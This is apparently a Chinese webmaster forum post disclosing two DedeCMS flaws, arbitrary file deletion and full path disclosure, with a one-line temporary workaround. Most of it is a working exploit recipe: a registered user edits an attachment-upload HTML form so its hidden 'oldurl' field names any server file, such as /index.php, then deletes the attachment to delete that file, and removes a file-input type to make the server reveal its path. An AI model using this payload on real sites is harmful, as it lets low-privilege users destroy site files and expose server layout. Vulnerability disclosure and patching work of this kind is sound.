DEDECMS 最新漏洞可任意删除文件
DEDECMS 最新漏洞,可任意删除文件。DEDE在五月发布了最新的补丁。可是这个补丁并没有用。现在将些BUG发布出来。1.删除网站任意文件.
2.显示对路径
1.删除任意文件.
注册正常用户...随意找个地方上传个附件就OK.
部分代码:
form class=mTB10 mL10 mR10 name=form1 action=uploads_edit.php method=post enctype=multipart/form-datainput type=hidden name=aid value=28 /input type=hidden name=mediatype value=1 /input type=hidden name=oldurl value=要删除的文件 / !--如value=/index.php input type=hidden name=dopost value=save /table cellspacing=1 class=submit
修改完毕后.打开HTML页.直接点提交.
然后在用户管理附件里点击删除.
2.爆路径.
也是利用原来的html代码..
td align=right valign=top更换附件:/td tdinput name=addonfile type=file id=addonfile style=width:300px //td 把type=file删除.保存.然后打开.直接点提交.
就可以爆路径了..
临时解决方法.:禁止用户注册.或禁止用户发附件
聚站吧|站长资讯交流群 欢迎大家前来交流。
首发:聚站吧|站长资讯 如有请保留出处。
页:
[1]